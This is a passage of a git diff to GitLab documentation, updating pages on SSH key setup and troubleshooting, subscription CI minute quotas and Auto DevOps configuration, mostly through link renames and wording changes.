fingerprints](../user/gitlab_com/index.md#ssh-host-keys-fingerprints). +1. Open a terminal and run this command, replacing `gitlab.example.com` with your GitLab instance URL: + + ```shell + ssh -T git@gitlab.example.com + ``` + +1. If this is the first time you connect, you should verify the + authenticity of the GitLab host. If you see a message like: + + ```plaintext + The authenticity of host 'gitlab.example.com (35.231.145.151)' can't be established. + ECDSA key fingerprint is SHA256:HbW3g8zUjNSksFbqTiUWPWg2Bq1x8xdGUrliXFzSnUw. + Are you sure you want to continue connecting (yes/no)? yes + Warning: Permanently added 'gitlab.example.com' (ECDSA) to the list of known hosts. + ``` + + Type `yes` and press Enter. + +1. Run the `ssh -T git@gitlab.example.com` command again. You should receive a _Welcome to GitLab, `@username`!_ message. + +If the welcome message doesn't appear, you can troubleshoot by running `ssh` +in verbose mode: + +```shell +ssh -Tvvv git@gitlab.example.com +``` + +## Use different keys for different repositories + +You can use a different key for each repository. + +Open a terminal and run this command: + +```shell +git config core.sshCommand "ssh -o IdentitiesOnly=yes -i ~/.ssh/private-key-filename-for-this-repository -F /dev/null" +``` + +This command does not use the SSH Agent and requires Git 2.10 or later. For more information +on `ssh` command options, see the `man` pages for both `ssh` and `ssh_config`. + +## Use different accounts on a single GitLab instance + +You can use multiple accounts to connect to a single instance of GitLab. +You can do this by using the command in the [previous topic](#use-different-keys-for-different-repositories). +However, even if you set `IdentitiesOnly` to `yes`, you cannot sign in if an `IdentityFile` exists +outside of a `Host` block. + +Instead, you can assign aliases to hosts in the `~.ssh/config` file. + +- For the `Host`, use an alias like `user_1.gitlab.com` and + `user_2.gitlab.com`. Advanced configurations + are more difficult to maintain, and these strings are easier to + understand when you use tools like `git remote`. +- For the `IdentityFile`, use the path the private key. + +```conf +# User1 Account Identity +Host <user_1.gitlab.com> + Hostname gitlab.com + PreferredAuthentications publickey + IdentityFile ~/.ssh/<example_ssh_key1> + +# User2 Account Identity +Host <user_2.gitlab.com> + Hostname gitlab.com + PreferredAuthentications publickey + IdentityFile ~/.ssh/<example_ssh_key2> +``` + +Now, to clone a repository for `user_1`, use `user_1.gitlab.com` in the `git clone` command: + +```shell +git clone git@<user_1.gitlab.com>:gitlab-org/gitlab.git +``` + +To update a previously-cloned repository that is aliased as `origin`: + +```shell +git remote set-url origin git@<user_1.gitlab.com>:gitlab-org/gitlab.git +``` + +NOTE: +Private and public keys contain sensitive data. Ensure the permissions +on the files make them readable to you but not accessible to others. + +## Configure two-factor authentication (2FA) + +You can set up two-factor authentication (2FA) for +[Git over SSH](../security/two_factor_authentication.md#two-factor-authentication-2fa-for-git-over-ssh-operations). + +## Use EGit on Eclipse + +If you are using [EGit](https://www.eclipse.org/egit/), you can [add your SSH key to Eclipse](https://wiki.eclipse.org/EGit/User_Guide#Eclipse_SSH_Configuration). + +## Use SSH on Microsoft Windows + +If you're running Windows 10, you can either use the [Windows Subsystem for Linux (WSL)](https://docs.microsoft.com/en-us/windows/wsl/install-win10) +with [WSL 2](https://docs.microsoft.com/en-us/windows/wsl/install-win10#update-to-wsl-2) which +has both `git` and `ssh` preinstalled, or install [Git for Windows](https://gitforwindows.org) to +use SSH through Powershell. + +The SSH key generated in WSL is not directly available for Git for Windows, and vice versa, +as both have a different home directory: + +- WSL: `/home/<user>` +- Git for Windows: `C:\Users\<user>` + +You can either copy over the `.ssh/` directory to use the same key, or generate a key in each environment. + +Alternative tools include: + +- [Cygwin](https://www.cygwin.com) +- [PuttyGen](https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html) + +## Overriding SSH settings on the GitLab server + +GitLab integrates with the system-installed SSH daemon and designates a user +(typically named `git`) through which all access requests are handled. Users +who connect to the GitLab server over SSH are identified by their SSH key instead +of their username. + +SSH *client* operations performed on the GitLab server are executed as this +user. You can modify this SSH configuration. For example, you can specify +a private SSH key for this user to use for authentication requests. However, this practice +is **not supported** and is strongly discouraged as it presents significant +security risks. + +GitLab checks for this condition, and directs you +to this section if your server is configured this way. For example: + +```shell +$ gitlab-rake gitlab:check + +Git user has default SSH configuration? ... no + Try fixing it: + mkdir ~/gitlab-check-backup-1504540051 + sudo mv /var/lib/git/.ssh/id_rsa ~/gitlab-check-backup-1504540051 + sudo mv /var/lib/git/.ssh/id_rsa.pub ~/gitlab-check-backup-1504540051 + For more information see: + [Overriding SSH settings on the GitLab server](#overriding-ssh-settings-on-the-gitlab-server) + Please fix the error above and rerun the checks. +``` + +Remove the custom configuration as soon as you can. These customizations +are **explicitly not supported** and may stop working at any time. + +## Troubleshooting SSH connections + +When you run `git clone`, you may be prompted for a password, like `git@gitlab.example.com's password:`. +This indicates that something is wrong with your SSH setup. + +- Ensure that you generated your SSH key pair correctly and added the public SSH + key to your GitLab profile. +- Try to manually register your private SSH key by using `ssh-agent`. +- Try to debug the connection by running `ssh -Tv git@example.com`. + Replace `example.com` with your GitLab URL. diff --git a/doc/subscriptions/bronze_starter.md b/doc/subscriptions/bronze_starter.md index 66ab61e48b8..410759aa506 100644 --- a/doc/subscriptions/bronze_starter.md +++ b/doc/subscriptions/bronze_starter.md @@ -16,7 +16,7 @@ The following features remain available to Bronze and Starter customers, even th the tiers are no longer mentioned in GitLab documentation: - [Activate GitLab EE with a license](../user/admin_area/license.md) -- [Adding a help message to the login page](../user/admin_area/settings/help_page.md#adding-a-help-message-to-the-login-page) +- [Add a help message to the sign-in page](../user/admin_area/settings/help_page.md#add-a-help-message-to-the-sign-in-page) - [Burndown and burnup charts](../user/project/milestones/burndown_and_burnup_charts.md), including [per-project charts](../user/project/milestones/index.md#project-burndown-charts) and [per-group charts](../user/project/milestones/index.md#group-burndown-charts) @@ -72,7 +72,7 @@ the tiers are no longer mentioned in GitLab documentation: - [Required Approvals](../user/project/merge_requests/approvals/index.md#required-approvals) - [Code Owners as eligible approvers](../user/project/merge_requests/approvals/rules.md#code-owners-as-eligible-approvers) - [Approval rules](../user/project/merge_requests/approvals/rules.md) features - - [Restricting push and merge access to certain users](../user/project/protected_branches.md#restricting-push-and-merge-access-to-certain-users) + - [Restricting push and merge access to certain users](../user/project/protected_branches.md) - [Visual Reviews](../ci/review_apps/index.md#visual-reviews) - Metrics and analytics: - [Contribution Analytics](../user/group/contribution_analytics/index.md) @@ -89,16 +89,16 @@ the tiers are no longer mentioned in GitLab documentation: - Repositories: - [Repository size limit](../user/admin_area/settings/account_and_limit_settings.md#repository-size-limit) - Repository mirroring: - - [Pull mirroring](../user/project/repository/repository_mirroring.md#pulling-from-a-remote-repository) outside repositories in a GitLab repository + - [Pull mirroring](../user/project/repository/repository_mirroring.md#pull-from-a-remote-repository) outside repositories in a GitLab repository - [Overwrite diverged branches](../user/project/repository/repository_mirroring.md#overwrite-diverged-branches) - [Trigger pipelines for mirror updates](../user/project/repository/repository_mirroring.md#trigger-pipelines-for-mirror-updates) - [Hard failures](../user/project/repository/repository_mirroring.md#hard-failure) when mirroring fails - [Trigger pull mirroring from the API](../user/project/repository/repository_mirroring.md#trigger-an-update-using-the-api) - [Mirror only protected branches](../user/project/repository/repository_mirroring.md#mirror-only-protected-branches) - [Bidirectional mirroring](../user/project/repository/repository_mirroring.md#bidirectional-mirroring) - - [Mirroring with Perforce Helix via Git Fusion](../user/project/repository/repository_mirroring.md#mirroring-with-perforce-helix-via-git-fusion) + - [Mirror with Perforce Helix via Git Fusion](../user/project/repository/repository_mirroring.md#mirror-with-perforce-helix-via-git-fusion) - Runners: - - Run pipelines in the parent project [for merge requests from a forked project](../ci/merge_request_pipelines/index.md#run-pipelines-in-the-parent-project-for-merge-requests-from-a-forked-project) + - Run pipelines in the parent project [for merge requests from a forked project](../ci/pipelines/merge_request_pipelines.md#run-pipelines-in-the-parent-project-for-merge-requests-from-a-forked-project) - [Shared runners pipeline minutes quota](../user/admin_area/settings/continuous_integration.md#shared-runners-pipeline-minutes-quota) - [Push rules](../push_rules/push_rules.md) - SAML for self-managed GitLab instance: diff --git a/doc/subscriptions/gitlab_com/index.md b/doc/subscriptions/gitlab_com/index.md index 552f0e28d95..fad415807bd 100644 --- a/doc/subscriptions/gitlab_com/index.md +++ b/doc/subscriptions/gitlab_com/index.md @@ -7,9 +7,9 @@ type: index, reference # GitLab SaaS subscription **(PREMIUM SAAS)** -GitLab SaaS is the GitLab software-as-a-service offering. You don't need to -install anything to use GitLab SaaS, you only need to -[sign up](https://gitlab.com/users/sign_up) and start using GitLab straight away. +GitLab SaaS is the GitLab software-as-a-service offering, which is available at GitLab.com. +You don't need to install anything to use GitLab SaaS, you only need to +[sign up](https://gitlab.com/users/sign_up). This page reviews the details of your GitLab SaaS subscription. @@ -272,14 +272,33 @@ If you add a member to a group by using the [share a group with another group](. ## CI pipeline minutes -CI pipeline minutes are the execution time for your -[pipelines](../../ci/pipelines/index.md) on GitLab shared runners. Each -[GitLab SaaS tier](https://about.gitlab.com/pricing/) includes a monthly quota -of CI pipeline minutes: - -- Free: 400 minutes -- Premium: 10,000 minutes -- Ultimate: 50,000 minutes +CI pipeline minutes are the execution time for your [pipelines](../../ci/pipelines/index.md) +on GitLab shared runners. Each [GitLab SaaS tier](https://about.gitlab.com/pricing/) +includes a monthly quota of CI pipeline minutes for private and public projects in +the namespace: + +| Plan | CI pipeline minutes | +|----------|---------------------| +| Free | 400 | +| Premium | 10,000 | +| Ultimate | 50,000 | + +The consumption rate for CI pipeline minutes is based on the visibility of the projects: + +- Private projects in the namespace consume pipeline minutes at a rate of 1 CI pipeline minute + per 1 minute of execution time on GitLab shared runners. +- Public projects in: + - Namespaces [created on or after 2021-07-17](https://gitlab.com/gitlab-org/gitlab/-/issues/332708) + consume pipeline minutes at a slower rate, 1 CI pipeline minute per 125 minutes + of execution time on GitLab shared runners. The per-minute rate for public projects + is 0.008 CI pipeline minutes per 1 minute of execution time on GitLab shared runners. + - Namespaces created before 2021-07-17 do not consume CI pipeline minutes. + +| Plan | CI pipeline minutes | Maximum **private** project execution time (all namespaces) | Maximum **public** project execution time (namespaces created 2021-07-17 and later) | +|----------|---------------------|-------------------------------------------------------------|-------------------------------------------------------------------------------------| +| Free | 400 | 400 minutes | 50,000 minutes | +| Premium | 10,000 | 10,000 minutes | 1,250,000 minutes | +| Ultimate | 50,000 | 50,000 minutes | 6,250,000 minutes | Quotas apply to: diff --git a/doc/subscriptions/index.md b/doc/subscriptions/index.md index 575ddd5462e..b6aa2d09770 100644 --- a/doc/subscriptions/index.md +++ b/doc/subscriptions/index.md @@ -184,7 +184,7 @@ For qualifying open source projects, the [GitLab for Open Source](https://about. the top GitLab tier, plus 50,000 CI minutes per month. You can find more information about the [program requirements](https://about.gitlab.com/solutions/open-source/join/#requirements), -[renewals](https://about.gitlab.com/solutions/open-source/join/$renewals), +[renewals](https://about.gitlab.com/solutions/open-source/join/#renewals), and benefits on the [GitLab for Open Source application page](https://about.gitlab.com/solutions/open-source/join/). If you have any questions, send an email to `opensource@gitlab.com` for assistance. @@ -209,13 +209,13 @@ You must ensure that you add the correct license to each project within your gro After you ensure that you are using OSI-approved licenses for your projects, you can take your screenshots. -###### Screenshot 1: License overview +##### Screenshot 1: License overview On the left sidebar, select **Project information > Details**. Take a screenshot that includes a view of the license you've chosen for your project.  -###### Screenshot 2: License file +##### Screenshot 2: License file Navigate to one of the license files that you uploaded. You can usually find the license file by selecting **Project information > Details** and scanning the page for the license. Make sure the screenshot includes the title of the license. diff --git a/doc/subscriptions/self_managed/index.md b/doc/subscriptions/self_managed/index.md index c4484ea609f..2f3d705c1fe 100644 --- a/doc/subscriptions/self_managed/index.md +++ b/doc/subscriptions/self_managed/index.md @@ -39,7 +39,7 @@ for each tier, see the A GitLab self-managed subscription uses a hybrid model. You pay for a subscription according to the maximum number of users enabled during the subscription period. -For instances that aren't offline or on a closed network, the maximum number of +For instances that are offline or on a closed network, the maximum number of simultaneous users in the GitLab self-managed installation is checked each quarter, using [Seat Link](#seat-link). diff --git a/doc/topics/authentication/index.md b/doc/topics/authentication/index.md index 4181e32fcf2..83c9e180c1c 100644 --- a/doc/topics/authentication/index.md +++ b/doc/topics/authentication/index.md @@ -10,7 +10,7 @@ This page gathers all the resources for the topic **Authentication** within GitL ## GitLab users -- [SSH](../../ssh/README.md) +- [SSH](../../ssh/index.md) - [Two-Factor Authentication (2FA)](../../user/profile/account/two_factor_authentication.md#two-factor-authentication) - [Why do I keep getting signed out?](../../user/profile/index.md#why-do-i-keep-getting-signed-out) - **Articles:** @@ -39,10 +39,10 @@ This page gathers all the resources for the topic **Authentication** within GitL ## API -- [OAuth 2 Tokens](../../api/README.md#oauth2-tokens) -- [Personal access tokens](../../api/README.md#personalproject-access-tokens) -- [Project access tokens](../../api/README.md#personalproject-access-tokens) -- [Impersonation tokens](../../api/README.md#impersonation-tokens) +- [OAuth 2 Tokens](../../api/index.md#oauth2-tokens) +- [Personal access tokens](../../api/index.md#personalproject-access-tokens) +- [Project access tokens](../../api/index.md#personalproject-access-tokens) +- [Impersonation tokens](../../api/index.md#impersonation-tokens) - [GitLab as an OAuth2 provider](../../api/oauth2.md#gitlab-as-an-oauth2-provider) ## Third-party resources diff --git a/doc/topics/autodevops/customize.md b/doc/topics/autodevops/customize.md index 42c54961c1d..8f48b1fc57a 100644 --- a/doc/topics/autodevops/customize.md +++ b/doc/topics/autodevops/customize.md @@ -146,7 +146,7 @@ repository or by specifying a project CI/CD variable: file in it, Auto DevOps detects the chart and uses it instead of the [default chart](https://gitlab.com/gitlab-org/cluster-integration/auto-deploy-image/-/tree/master/assets/auto-deploy-app), enabling you to control exactly how your application is deployed. -- **Project variable** - Create a [project CI/CD variable](../../ci/variables/README.md) +- **Project variable** - Create a [project CI/CD variable](../../ci/variables/index.md) `AUTO_DEVOPS_CHART` with the URL of a custom chart to use, or create two project variables: `AUTO_DEVOPS_CHART_REPOSITORY` with the URL of a custom chart repository, and `AUTO_DEVOPS_CHART` with the path to the chart. @@ -181,17 +181,17 @@ list of options. ## Custom Helm chart per environment You can specify the use of a custom Helm chart per environment by scoping the CI/CD variable -to the desired environment. See [Limit environment scope of CI/CD variables](../../ci/variables/README.md#limit-the-environment-scope-of-a-cicd-variable). +to the desired environment. See [Limit environment scope of CI/CD variables](../../ci/variables/index.md#limit-the-environment-scope-of-a-cicd-variable). ## Customizing `.gitlab-ci.yml` Auto DevOps is completely customizable because the [Auto DevOps template](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Auto-DevOps.gitlab-ci.yml) -is just an implementation of a [`.gitlab-ci.yml`](../../ci/yaml/README.md) file, +is just an implementation of a [`.gitlab-ci.yml`](../../ci/yaml/index.md) file, and uses only features available to any implementation of `.gitlab-ci.yml`. To modify the CI/CD pipeline used by Auto DevOps, -[`include` the template](../../ci/yaml/README.md#includetemplate), and customize +[`include` the template](../../ci/yaml/index.md#includetemplate), and customize it as needed by adding a `.gitlab-ci.yml` file to the root of your repository containing the following: @@ -202,7 +202,7 @@ include: Add your changes, and your additions are merged with the [Auto DevOps template](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Auto-DevOps.gitlab-ci.yml) -using the behavior described for [`include`](../../ci/yaml/README.md#include). +using the behavior described for [`include`](../../ci/yaml/index.md#include). If you need to specifically remove a part of the file, you can also copy and paste the contents of the [Auto DevOps template](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Auto-DevOps.gitlab-ci.yml) @@ -254,13 +254,13 @@ include: See the [Auto DevOps template](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Auto-DevOps.gitlab-ci.yml) for information on available jobs. WARNING: -Auto DevOps templates using the [`only`](../../ci/yaml/README.md#only--except) or -[`except`](../../ci/yaml/README.md#only--except) syntax have switched -to the [`rules`](../../ci/yaml/README.md#rules) syntax, starting in +Auto DevOps templates using the [`only`](../../ci/yaml/index.md#only--except) or +[`except`](../../ci/yaml/index.md#only--except) syntax have switched +to the [`rules`](../../ci/yaml/index.md#rules) syntax, starting in [GitLab 13.0](https://gitlab.com/gitlab-org/gitlab/-/issues/213336). If your `.gitlab-ci.yml` extends these Auto DevOps templates and override the `only` or `except` keywords, you must migrate your templates to use the -[`rules`](../../ci/yaml/README.md#rules) syntax after the +[`rules`](../../ci/yaml/index.md#rules) syntax after the base template is migrated to use the `rules` syntax. For users who cannot migrate just yet, you can alternatively pin your templates to the [GitLab 12.10 based templates](https://gitlab.com/gitlab-org/auto-devops-v12-10). @@ -314,6 +314,19 @@ The version of the chart used to provision PostgreSQL: GitLab encourages users to [migrate their database](upgrading_postgresql.md) to the newer PostgreSQL. +### Customize values for PostgreSQL Helm Chart + +> [Introduced](https://gitlab.com/gitlab-org/cluster-integration/auto-deploy-image/-/issues/113) in auto-deploy-image v2, in GitLab 13.8. + +To set custom values, do one of the following: + +- Add a file named `.gitlab/auto-deploy-postgres-values.yaml` to your repository. If found, this + file is used automatically. This file is used by default for PostgreSQL Helm upgrades. +- Add a file with a different name or path to the repository, and set the + `POSTGRES_HELM_UPGRADE_VALUES_FILE` [environment variable](#database) with the path + and name. +- Set the `POSTGRES_HELM_UPGRADE_EXTRA_ARGS` [environment variable](#database). + ### Using external PostgreSQL database providers While Auto DevOps provides out-of-the-box support for a PostgreSQL container for @@ -378,7 +391,7 @@ applications. | `HELM_UPGRADE_EXTRA_ARGS` | From GitLab 11.11, allows extra options in `helm upgrade` commands when deploying the application. Note that using quotes doesn't prevent word splitting. | | `INCREMENTAL_ROLLOUT_MODE` | From GitLab 11.4, if present, can be used to enable an [incremental rollout](#incremental-rollout-to-production) of your application for the production environment. Set to `manual` for manual deployment jobs or `timed` for automatic rollout deployments with a 5 minute delay each one. | | `K8S_SECRET_*` | From GitLab 11.7, any variable prefixed with [`K8S_SECRET_`](#application-secret-variables) is made available by Auto DevOps as environment variables to the deployed application. | -| `KUBE_INGRESS_BASE_DOMAIN` | From GitLab 11.8, can be used to set a domain per cluster. See [cluster domains](../../user/project/clusters/index.md#base-domain) for more information. | +| `KUBE_INGRESS_BASE_DOMAIN` | From GitLab 11.8, can be used to set a domain per cluster. See [cluster domains](../../user/project/clusters/gitlab_managed_clusters.md#base-domain) for more information. | | `PRODUCTION_REPLICAS` | Number of replicas to deploy in the production environment. Takes precedence over `REPLICAS` and defaults to 1. For zero downtime upgrades, set to 2 or greater. | | `REPLICAS` | Number of replicas to deploy. Defaults to 1. | | `ROLLOUT_RESOURCE_TYPE` | From GitLab 11.9, allows specification of the resource type being deployed when using a custom Helm chart. Default value is `deployment`. | @@ -387,7 +400,7 @@ applications. NOTE: After you set up your replica variables using a -[project CI/CD variable](../../ci/variables/README.md), +[project CI/CD variable](../../ci/variables/index.md), you can scale your application by redeploying it. WARNING: @@ -406,8 +419,10 @@ The following table lists CI/CD variables related to the database. | `POSTGRES_ENABLED` | Whether PostgreSQL is enabled. Defaults to `true`. Set to `false` to disable the automatic deployment of PostgreSQL. | | `POSTGRES_USER` | The PostgreSQL user. Defaults to `user`. Set it to use a custom username. | | `POSTGRES_PASSWORD` | The PostgreSQL password. Defaults to `testing-password`. Set it to use a custom password. | -| `POSTGRES_DB` | The PostgreSQL database name. Defaults to the value of [`$CI_ENVIRONMENT_SLUG`](../../ci/variables/README.md#predefined-cicd-variables). Set it to use a custom database name. | +| `POSTGRES_DB` | The PostgreSQL database name. Defaults to the value of [`$CI_ENVIRONMENT_SLUG`](../../ci/variables/index.md#predefined-cicd-variables). Set it to use a custom database name. | | `POSTGRES_VERSION` | Tag for the [`postgres` Docker image](https://hub.docker.com/_/postgres) to use. Defaults to `9.6.16` for tests and deployments as of GitLab 13.0 (previously `9.6.2`). If `AUTO_DEVOPS_POSTGRES_CHANNEL` is set to `1`, deployments uses the default version `9.6.2`. | +| `POSTGRES_HELM_UPGRADE_VALUES_FILE` | In GitLab 13.8 and later, and when using [auto-deploy-image v2](upgrading_auto_deploy_dependencies.md), this variable allows the `helm upgrade` values file for PostgreSQL to be overridden. Defaults to `.gitlab/auto-deploy-postgres-values.yaml`. | +| `POSTGRES_HELM_UPGRADE_EXTRA_ARGS` | In GitLab 13.8 and later, and when using [auto-deploy-image v2](upgrading_auto_deploy_dependencies.md), this variable allows extra PostgreSQL options in `helm upgrade` commands when deploying the application. Note that using quotes doesn't prevent word splitting. | ### Disable jobs diff --git a/doc/topics/autodevops/index.md b/doc/topics/autodevops/index.md index f2ce61044ef..beb5f6a58f6 100644 --- a/doc/topics/autodevops/index.md +++ b/doc/topics/autodevops/index.md @@ -9,9 +9,8 @@ info: To determine the technical writer assigned to the Stage/Group associated w > - Introduced in GitLab 11.0 for general availability. GitLab Auto DevOps helps to reduce the complexity of software delivery by -setting up pipelines and integrations for you. Instead of requiring you to -manually configure your entire GitLab environment, Auto DevOps configures -many of these areas for you, including security auditing and vulnerability +setting up pipelines and integrations for you. Auto DevOps configures +GitLab CI/CD pipelines including security auditing and vulnerability testing. Using Auto DevOps, you can: @@ -54,17 +53,17 @@ following levels: | GitLab SaaS | **{check-circle}** Yes | **{dotted-circle}** No | **{dotted-circle}** No | | GitLab self-managed | **{check-circle}** Yes | **{check-circle}** Yes | **{check-circle}** Yes | -When you enable AutoDevOps for your instance, it attempts to run on all -pipelines in each project, but will automatically disable itself for individual +When you enable Auto DevOps for your instance, it attempts to run on all +pipelines in each project. The Auto DevOps setting automatically disables itself for individual projects on their first pipeline failure. An instance administrator can enable or disable this default in the [Auto DevOps settings](../../user/admin_area/settings/continuous_integration.md#auto-devops). -Since [GitLab 12.7](https://gitlab.com/gitlab-org/gitlab/-/issues/26655), +[Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/26655) in GitLab 12.7, Auto DevOps runs on pipelines automatically only if a [`Dockerfile` or matching buildpack](stages.md#auto-build) exists. -If a [CI/CD configuration file](../../ci/yaml/README.md) is present in the -project, it isn't changed and won't be affected by Auto DevOps. +If a [CI/CD configuration file](../../ci/yaml/index.md) is present in the +project, it remains unchanged and Auto DevOps doesn't affect it. ### At the project level @@ -80,7 +79,7 @@ To enable it: and choose the [deployment strategy](#deployment-strategy). 1. Click **Save changes** for the changes to take effect. -After enabling the feature, an Auto DevOps pipeline is triggered on the `master` branch. +After enabling the feature, an Auto DevOps pipeline is triggered on the default branch. ### At the group level @@ -88,9 +87,8 @@ After enabling the feature, an Auto DevOps pipeline is triggered on the `master` Only administrators and group owners can enable or disable Auto DevOps at the group level. -When enabling or disabling Auto DevOps at group level, group configuration is -implicitly used for the subgroups and projects inside that group, unless Auto DevOps -is specifically enabled or disabled on the subgroup or project. +When you enable Auto DevOps at group level, the subgroups and projects in that group inherit the configuration. Auto DevOps +can be specifically enabled or disabled individually for projects and subgroups. To enable or disable Auto DevOps at the group level: @@ -103,7 +101,8 @@ To enable or disable Auto DevOps at the group level: Even when disabled at the instance level, group owners and project maintainers can still enable Auto DevOps at the group and project level, respectively. -1. As an administrator, go to **Admin Area > Settings > CI/CD > Continuous Integration and Deployment**. +1. As an administrator, on the top bar, select **Menu >** **{admin}** **Admin**. +1. Go to **Settings > CI/CD > Continuous Integration and Deployment**. 1. Select **Default to Auto DevOps pipeline for all projects** to enable it. 1. (Optional) You can set up the Auto DevOps [base domain](#auto-devops-base-domain), for Auto Deploy and Auto Review Apps to use. @@ -118,7 +117,7 @@ project's **Settings > CI/CD > Auto DevOps**. The following options are available: - **Continuous deployment to production**: Enables [Auto Deploy](stages.md#auto-deploy) - with `master` branch directly deployed to production. + with the default branch directly deployed to production. - **Continuous deployment to production using timed incremental rollout**: Sets the [`INCREMENTAL_ROLLOUT_MODE`](customize.md#timed-incremental-rollout-to-production) variable to `timed`. Production deployments execute with a 5 minute delay between @@ -128,7 +127,7 @@ are available: [`INCREMENTAL_ROLLOUT_MODE`](customize.md#incremental-rollout-to-production) variables to `1` and `manual`. This means: - - `master` branch is directly deployed to staging. + - The default branch is directly deployed to staging. - Manual actions are provided for incremental rollout to production. NOTE: @@ -137,12 +136,12 @@ to minimize downtime and risk. ## Quick start -If you're using GitLab.com, see the [quick start guide](quick_start_guide.md) -for setting up Auto DevOps with GitLab.com and a Kubernetes cluster on Google Kubernetes +For GitLab.com users, see the [quick start guide](quick_start_guide.md) +for setting up Auto DevOps deploying to a Kubernetes cluster on Google Kubernetes Engine (GKE). If you use a self-managed instance of GitLab, you must configure the -[Google OAuth2 OmniAuth Provider](../../integration/google.md) before +[Google OAuth 2.0 OmniAuth Provider](../../integration/google.md) before configuring a cluster on GKE. After configuring the provider, you can follow the steps in the [quick start guide](quick_start_guide.md) to get started. @@ -173,7 +172,7 @@ NOTE: Depending on your target platform, some features might not be available to you. Comprised of a set of [stages](stages.md), Auto DevOps brings these best practices to your -project in a simple and automatic way: +project automatically: - [Auto Browser Performance Testing](stages.md#auto-browser-performance-testing) - [Auto Build](stages.md#auto-build) @@ -222,18 +221,17 @@ The Auto DevOps base domain is required to use [Auto Monitoring](stages.md#auto-monitoring). You can define the base domain in any of the following places: -- either under the cluster's settings, whether for an instance, - [projects](../../user/project/clusters/index.md#base-domain) or +- Either under the cluster's settings, whether for an instance, + [projects](../../user/project/clusters/gitlab_managed_clusters.md#base-domain) or [groups](../../user/group/clusters/index.md#base-domain) -- or at the project level as a variable: `KUBE_INGRESS_BASE_DOMAIN` -- or at the group level as a variable: `KUBE_INGRESS_BASE_DOMAIN` -- or as an instance-wide fallback in **Admin Area > Settings > CI/CD** under the - **Continuous Integration and Delivery** section +- Or at the project level as a variable: `KUBE_INGRESS_BASE_DOMAIN` +- Or at the group level as a variable: `KUBE_INGRESS_BASE_DOMAIN` +- Or as an instance-wide fallback in **Menu >** **{admin}** **Admin >** + **Settings > CI/CD** under the **Continuous Integration and Delivery** section. The base domain variable `KUBE_INGRESS_BASE_DOMAIN` follows the same order of precedence -as other environment [variables](../../ci/variables/README.md#cicd-variable-precedence). -If the CI/CD variable is not set and the cluster setting is left blank, the instance-wide **Auto DevOps domain** -setting is used if set. +as other environment [variables](../../ci/variables/index.md#cicd-variable-precedence). +If this variable isn't set and the cluster setting is left blank, the instance-wide domain is used if set for your instance. Auto DevOps requires a wildcard DNS A record matching the base domain(s). For a base domain of `example.com`, you'd need a DNS entry like: @@ -258,14 +256,14 @@ to the Kubernetes pods running your application. See [Auto DevOps requirements for Amazon ECS](requirements.md#auto-devops-requirements-for-amazon-ecs). -## Using multiple Kubernetes clusters +## Use multiple Kubernetes clusters When using Auto DevOps, you can deploy different environments to different Kubernetes clusters, due to the 1:1 connection -[existing between them](../../user/project/clusters/index.md#multiple-kubernetes-clusters). +[existing between them](../../user/project/clusters/multiple_kubernetes_clusters.md). The [Deploy Job template](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Jobs/Deploy.gitlab-ci.yml) -used by Auto DevOps currently defines 3 environment names: +used by Auto DevOps defines 3 environment names: - `review/` (every environment starting with `review/`) - `staging` @@ -274,7 +272,7 @@ used by Auto DevOps currently defines 3 environment names: Those environments are tied to jobs using [Auto Deploy](stages.md#auto-deploy), so except for the environment scope, they must have a different deployment domain. You must define a separate `KUBE_INGRESS_BASE_DOMAIN` variable for each of the above -[based on the environment](../../ci/variables/README.md#limit-the-environment-scope-of-a-cicd-variable). +[based on the environment](../../ci/variables/index.md#limit-the-environment-scope-of-a-cicd-variable). The following table is an example of how to configure the three different clusters: @@ -296,8 +294,8 @@ To add a different cluster for each environment: 1. Navigate to each cluster's page, through **Infrastructure > Kubernetes clusters**, and add the domain based on its Ingress IP address. -After completing configuration, you can test your setup by creating a merge request -and verifying your application is deployed as a Review App in the Kubernetes +After completing configuration, test your setup by creating a merge request. +Verify whether your application deployed as a Review App in the Kubernetes cluster with the `review/*` environment scope. Similarly, you can check the other environments. @@ -337,5 +335,23 @@ spec: value: "PUT_YOUR_HTTPS_PROXY_HERE" ``` +## Upgrade Auto DevOps dependencies when updating GitLab + +When updating GitLab, you may need to upgrade Auto DevOps dependencies to +match your new GitLab version: + +- [Upgrading Auto DevOps resources](upgrading_auto_deploy_dependencies.md): + - Auto DevOps template. + - Auto Deploy template. + - Auto Deploy image. + - Helm. + - Kubernetes. + - Environment variables. +- [Upgrading PostgreSQL](upgrading_postgresql.md). + +## Troubleshooting + +See [troubleshooting Auto DevOps](troubleshooting.md). + <!-- DO NOT ADD TROUBLESHOOTING INFO HERE --> <!-- Troubleshooting information has moved to troubleshooting.md --> diff --git a/doc/topics/autodevops/quick_start_guide.md b/doc/topics/autodevops/quick_start_guide.md index 448e9526b88..196f6dec7e7 100644 --- a/doc/topics/autodevops/quick_start_guide.md +++ b/doc/topics/autodevops/quick_start_guide.md @@ -14,7 +14,7 @@ to create a Kubernetes cluster manually using the Google Cloud Platform console. You are creating and deploying a simple application that you create from a GitLab template. These instructions also work for a self-managed GitLab instance; -ensure your own [runners are configured](../../ci/runners/README.md) and +ensure your own [runners are configured](../../ci/runners/index.md) and [Google OAuth is enabled](../../integration/google.md). ## Configure your Google account @@ -131,7 +131,7 @@ Follow these steps to configure the Base Domain where your apps will be accessib 1. A few minutes after you install NGINX, the load balancer obtains an IP address, and you can get the external IP address with the following command: - + ```shell kubectl get service ingress-nginx-ingress-controller -n gitlab-managed-apps -ojson | jq -r '.status.loadBalancer.ingress[].ip' ``` @@ -155,7 +155,7 @@ these steps to enable Auto DevOps if it's disabled: 1. Navigate to **Settings > CI/CD > Auto DevOps**, and click **Expand**. 1. Select **Default to Auto DevOps pipeline** to display more options. 1. In **Deployment strategy**, select your desired [continuous deployment strategy](index.md#deployment-strategy) - to deploy the application to production after the pipeline successfully runs on the `master` branch. + to deploy the application to production after the pipeline successfully runs on the default branch. 1. Click **Save changes**.  @@ -199,7 +199,7 @@ The jobs are separated into stages: licenses and is allowed to fail ([Auto License Compliance](stages.md#auto-license-compliance)) **(ULTIMATE)** -- **Review** - Pipelines on 